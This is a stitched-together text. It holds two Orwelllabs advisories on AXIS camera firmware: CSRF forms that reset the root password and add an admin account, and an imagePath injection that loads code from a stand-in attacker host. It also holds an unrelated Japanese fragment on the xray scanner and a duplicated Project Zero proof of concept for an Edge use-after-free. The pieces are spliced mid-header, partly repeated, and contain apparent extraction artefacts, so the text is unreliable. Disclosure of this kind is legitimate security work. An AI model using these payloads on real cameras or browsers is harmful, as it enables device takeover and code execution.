- Research and Advisory: Orwelllabs
- Class: Session Management control [CWE-352]
- CVE Name: CVE-2015-8255
- Affected Versions:
- IoT Attack Surface: Device Web Interface
- OWASP IoTTop10: I1
Technical Details
=================
Because of the (bad) design of this kind of device itself (actually one of the big
problems of IoT),
the embedded web application does not verify whether a valid request was
intentionally provided by the user who submitted the request.
PoCs
====
#-> Setting root password to W!nst0n
<html>
<!-- CSRF PoC Orwelllabs -->
<body>
<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
<input type="hidden" name="action" value="update" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="pwd" value="w!nst0n" />
<input type="hidden" name="comment" value="Administrator" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#-> Adding new credential SmithW:W!nst0n
<html>
<!-- CSRF PoC - Orwelllabs -->
<body>
<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="user" value="SmithW" />
<input type="hidden" name="sgrp"
value="viewer:operator:admin:ptz" />
<input type="hidden" name="pwd" value="W!nst0n" />
<input type="hidden" name="grp" value="users" />
<input type="hidden" name="comment" value="WebUser" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#-> Deleting an app via directly CSRF (axis_update.shtml)
http://xxx.xxx.xxx.xxx/axis-cgi/vaconfig.cgi?action=get&name=<script src="
http://xxx.xxx.xxx.xxx/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml
"></script>
[And many actions allowed to a user [all of them?] can be forged in this
way]
Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
Well, this is a very old design problem of this kind of device, nothing new
to say about that.
Credits
=======
These vulnerabilities have been discovered and published by Orwelllabs.
Legal Notices
=============
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.
About Orwelllabs
================
https://www.exploit-db.com/author/?a=8225
https://packetstormsecurity.com/files/author/12322/
0RWELLL4BS
**********
security advisory
olsa-2015-8258
PGP: 79A6CCC0
@orwelllabs
Advisory Information
====================
- Title: ImagePath Resource Injection/Open script editor
- Vendor: AXIS Communications
- Research and Advisory: Orwelllabs
- Class: Improper Input Validation [CWE-20]
- CVE Name: CVE-2015-8258
- Affected Versions: Firmware versions < 5.80.x
- IoT Attack Surface: Device Administrative Interface/Authentication/Authorization
- OWASP IoTTop10: I1, I2
Technical Details
=================
The variable "imagePath=" (which is prone to XSS in a large range of
products) can also be used for resource injection. If a URL is inserted
in this variable, a GET request will be made to that URL, so this is an
interesting point from which to request malicious code from the attacker's machine, and
of course the possibilities are vast (including hooking the browser).
An attacker sends the following URL to the current web user interface of
the camera:
http://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0
st.com/evilcode.html
This request will be processed normally and will return the status code 200
(OK):
[REQUEST]
GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1
Host: {axisvulnhost}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Digest username="Winst0n", realm="AXIS_XXXXXXXXXXX",
nonce="00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb",
uri="/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html",
response="5xxxxxxxxxxxxxxxxxxxxxx", qop=auth,
nc=0000002b, cnonce="00rw3ll4bs0rw3lll4bs"
Connection: keep-alive
GET /evilcode.html HTTP/1.1
Host: www.3vilh0st.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
Firefox/41.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0
st.com/evilcode.html
Connection: keep-alive
The server response can be seen below (clipped to the affected
HTML code snippets — just look for "http://www.3vilh0st.com/evilcode.html"):
<table border="0" cellpadding="3" cellspacing="3">
<tr>
<td id="videoStreamTable">
<script language="JavaScript">
<!--
video('http://www.3vilh0st.com/evilcode.html');
// -->
</script>
</td>
</tr>
</table>
[..SNIP..]
function listVideoSources()
{
var formInt = document.listFormInt;
var formExt = document.listFormExt;
var formCrop = document.listFormCrop;
var presetForm = document.listFormPreset;
var form = document.WizardForm
var currentPath = 'http://www.3vilh0st.com/evilcode.html';
var imageSource;
[..SNIP..]
var reload = false;
reload |= (other != null && other.search("seq=yes") >= 0);
reload |= (other != null && other.search("streamprofile=") >= 0);
reload |= ((other == null || (other != null && other.search("streamprofile=
;)(r") == -1)) && ('' != ""));
reload |= (imagePath != 'http://www.3vilh0st.com/evilcode.html');
[..SNIP..]
<script SRC="/incl/activeX.js?id=69"></script>
</head>
<body class="bodyBg" topmargin="0" leftmargin="15" marginwidth="0"
marginheight="0" onLoad="DrawTB('no', 'http://www.3vilh0st.com/evilcode.html',
'1', '0', 'no', 'no', 'true', getStreamProfileNbr());" onResize="">
<script language="JavaScript">
[..SNIP..]
// Draw the scale buttons
var currentResolution = 0
var width = 0
var height = 0
var imagepath = "http://www.3vilh0st.com/evilcode.html"
var resStart = imagepath.indexOf("resolution=")
if (resStart != -1) {
var resStop = imagepath.indexOf("&", resStart)
[..SNIP..]
=================== view.shtml snips =====================
447 function zoom(size) // view.shtml excerpt: reloads the page with the size= query parameter added or replaced
448 {
449 var url = document.URL; // includes whatever query string the page was loaded with
450
451 if (url.indexOf("?") == -1) {
452 url += "F?size=" + size // NOTE(review): the "F" before "?" looks like an extraction artefact — verify against the firmware
453 } else if (url.indexOf("size=") == -1) {
454 url += "&size=" + size
455 } else {
456 var searchStr = "size=<!--#echo var="size"
457 option="encoding:javascript" -->" // server-side include: the current size value is echoed into this JS string before the page is served
457 var replaceStr = "size=" + size
458 var re = new RegExp(searchStr , "g") // NOTE(review): regex source comes from the echoed size value; only safe if the SSI javascript encoding escapes every regex metacharacter — confirm
459 url = url.replace(re, replaceStr)
460 }
461
462 document.location = url;
463 }
464
465 var aNewImagePath; // target URL, assembled further down (line 567) from the imagePath parameter the advisory describes as unvalidated
466
467 function reloadPage() // navigates the document to the view URL built from imagePath; the parameter itself is not checked here
468 {
469 document.location = aNewImagePath;
470 }
471
[ SNIP ]
567 aNewImagePath = '/view/view.shtml?id=<!--#echo
var="ssi_request_id" option="encoding:url" -->&imagePath=' +
escape(imagePath) + size;
568 if (other != null)
569 aNewImagePath += other;
570 <!--#if expr="$ptzpresets = yes" -->
571 /* append preset parameters so that preset postion is selected in
drop down list after reload */
572 if (presetName != '')
573 aNewImagePath += "&gotopresetname=" + escape(presetName);
574 else if (gotopresetname != '')
575 aNewImagePath += "&gotopresetname=" + escape(gotopresetname);
576
577 if( newCamera != '')
578 aNewImagePath += "&camera=" + escape(newCamera);
---*---
Some legitimate resources can be very interesting to cybercriminals and their
ransomware/botnets/bitcoin miners/backdoors/malware etc. In this case
there are some resources, like the "Open Script Editor". With this resource
the user can edit any file in the operating system with root privileges,
because everything (in most IoT devices) runs with root
privileges; this is another dangerous point to keep in mind.
> Open Script Editor path: 'System Options' -> 'Advanced' -> 'Scripting'
Well, one can say that this feature is restricted to the administrator of
the camera, and this would be true if customers were forced to change the
default password during the setup phase under a strong password policy, since
changing "pass" to "pass123" does not solve the problem. The aggravating
factor is that there are thousands of products available on the internet
running with default credentials.
Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
According to the manufacturer, the resource injection vulnerability was
fixed in firmware 5.60, but we identified that the problem still occurred
in 5.80.x versions of various product models. Check for updates on the
manufacturer's website.
About the Open Script Editor, it was considered that in order to have access to
this feature it is necessary to be authenticated as an admin, but if there
is no policy that forces the client to change the password during the
product setup (ease vs. security) and also requires password complexity,
having an administrative credential to abuse the functionality is not
exactly an impediment (e.g. botnets that carry embedded in their code a
list of default credentials for that type of device).
Credits
=======
These vulnerabilities have been discovered and published by Orwelllabs.
Legal Notices
=============
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.
About Orwelllabs
================
https://www.exploit-db.com/author/?a=8225
https://packetstormsecurity.com/files/author/12322/
1。 Xray
のインストールと構成1。linux[root@instance-7q32v011 opt] #wget https://github.com/chaitin/xray/releases/download/0.21.8/xray_linux_amd64.zip 2。ファイルを解凍します[root@instance-7q32v011 opt] #unzip xray_linux_amd64.zip
3。 Xray実行可能ファイルを実行して、証明書と構成ファイルを生成する
[root@instance-7q32v011 opt]
2。サーバーソースの構成
1。ログイン:githubアカウントでウェブサイトにログインすると、sckey( "send message"ページ)2を取得できます。バインド:「WeChat Push」をクリックし、QRコードをスキャンして
3と同時にバインディングを完了します。メッセージを送信:http://Sc.ftqq.com/sckey.sendにGet Requestを送信して、WeChatでメッセージを受信できます。そのようなGETリクエストを生成する場合:https://sc.ftqq.com/scu100930te4d1
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1043
I noticed that some javascript getters behave strangely.
My test code:
var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];
var f = document.createElement("iframe");
f.onload = () => {
f.onload = null;
for (var x in window) {
if (whitelist.indexOf(x) != -1)
continue;
try {
window.__lookupGetter__(x).call(f.contentWindow);
log(x);
} catch (e) {
}
}
};
f.src = "https://abc.xyz/";
document.body.appendChild(f);
After some experimentation I finally reached a UAF condition. PoC is attached. RIP will jump into the freed JIT code.
Tested on Microsoft Edge 38.14393.0.0.
-->
<!--
Microsoft Edge: Undefined behavior on some getters
I noticed that some javascript getters behave strangely.
My test code:
var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];
var f = document.createElement("iframe");
f.onload = () => {
f.onload = null;
for (var x in window) {
if (whitelist.indexOf(x) != -1)
continue;
try {
window.__lookupGetter__(x).call(f.contentWindow);
log(x);
} catch (e) {
}
}
};
f.src = "https://abc.xyz/";
document.body.appendChild(f);
After some experimentation I finally reached a UAF condition. PoC is attached. RIP will jump into the freed JIT code.
Tested on Microsoft Edge 38.14393.0.0.
-->
<pre id="d">
</pre>
<body></body>
<script>
function log(txt) {
  // Append one "log: <txt>" line to the <pre id="d"> element; `d` is the global the
  // browser creates for that id. innerText keeps txt as plain text rather than markup.
  const entry = document.createElement("div");
  entry.innerText = "log: " + txt;
  d.appendChild(entry);
}
// PoC reproducer for the Edge getter issue described in the comment above. Indentation was
// lost in extraction; the nesting is main -> onload #1 -> onload #2 -> onload #3.
function main() {
var f = document.createElement("iframe");
// Handler 1: runs on the first load and arms handler 2 before re-navigating the frame.
f.onload = () => {
// Handler 2: invokes the parent window's `defaultStatus` getter with the child window as
// `this` — the cross-window getter call the header comment says behaves strangely.
f.onload = () => {
var status = window.__lookupGetter__("defaultStatus").call(f.contentWindow);
// Walks constructor -> constructor (presumably String -> Function) to reach a Function
// constructor belonging to the child realm, then compiles a trivial function with it.
var func_cons = status.constructor.constructor;
var ff = func_cons("return 0x12345;");
// Hot loop; presumably to get ff JIT-compiled (the header comment speaks of freed JIT code).
for (var i = 0; i < 0x100000; i++)
ff();
// Handler 3: after the child is navigated once more, ff is called again; per the header
// comment this is the point where execution reaches the freed JIT code.
f.onload = () => {
alert("get ready");
ff();
};
f.src = "about:blank";
};
//a = f.contentWindow;
f.src = "about:blank";
};
document.body.appendChild(f);
}
main();
</script>